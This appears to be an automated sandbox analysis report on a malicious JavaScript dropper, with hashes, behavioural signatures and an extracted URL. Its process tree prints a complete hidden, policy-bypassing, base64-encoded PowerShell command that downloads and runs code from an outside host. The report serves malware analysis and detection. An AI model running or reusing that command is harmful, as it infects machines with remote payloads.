Analysis
-
max time kernel
50s -
max time network
77s -
platform
windows7_x64 -
resource
win7-20221111-de -
resource tags
arch:x64arch:x86image:win7-20221111-delocale:de-deos:windows7-x64systemwindows -
submitted
06/12/2022, 10:27
Static task
static1
Behavioral task
behavioral1
Sample
2634_clf.js
Resource
win7-20221111-de
5 signatures
300 seconds
Behavioral task
behavioral2
Sample
2634_clf.js
Resource
win10v2004-20220812-de
12 signatures
300 seconds
General
-
Target
2634_clf.js
-
Size
39KB
-
MD5
7ba2a4ca8e9c49c7c1bfa4ee35f08e1f
-
SHA1
bf01404ed4ca76dd905ab27b8fddc4131a7eb468
-
SHA256
9fd5b91969328713b73e0c02a29cd70cfbe591a5129769bb59d4ffdcb8d8082e
-
SHA512
ee72b245750dc701f378a0b6332809006d601022e78fb1aeb183b2d003178f3a798478ad5b88923b9ea08ba79e9364275c7ec187a209cc2ff752a332b10ed8fe
-
SSDEEP
768:YNRwwCSRO0mTyphyksB7ulYb7+ae5Y5N6JgLERvqH3NGaShINCoJylf:YNRwwCsTvp8ksB7kYb7ne5uNksERvqXU
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://8llc.net/lite/index.php
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 700 powershell.exe 7 700 powershell.exe 9 700 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 700 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 272 wrote to memory of 1144 272 wscript.exe 28 PID 272 wrote to memory of 1144 272 wscript.exe 28 PID 272 wrote to memory of 1144 272 wscript.exe 28 PID 1144 wrote to memory of 700 1144 cmd.exe 30 PID 1144 wrote to memory of 700 1144 cmd.exe 30 PID 1144 wrote to memory of 700 1144 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2634_clf.js1⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowERshell -Nop -w Hidden -ep bypaSs -enC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwA4AGwAbABjAC4AbgBlAHQALwBsAGkAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowERshell -Nop -w Hidden -ep bypaSs -enC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwA4AGwAbABjAC4AbgBlAHQALwBsAGkAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-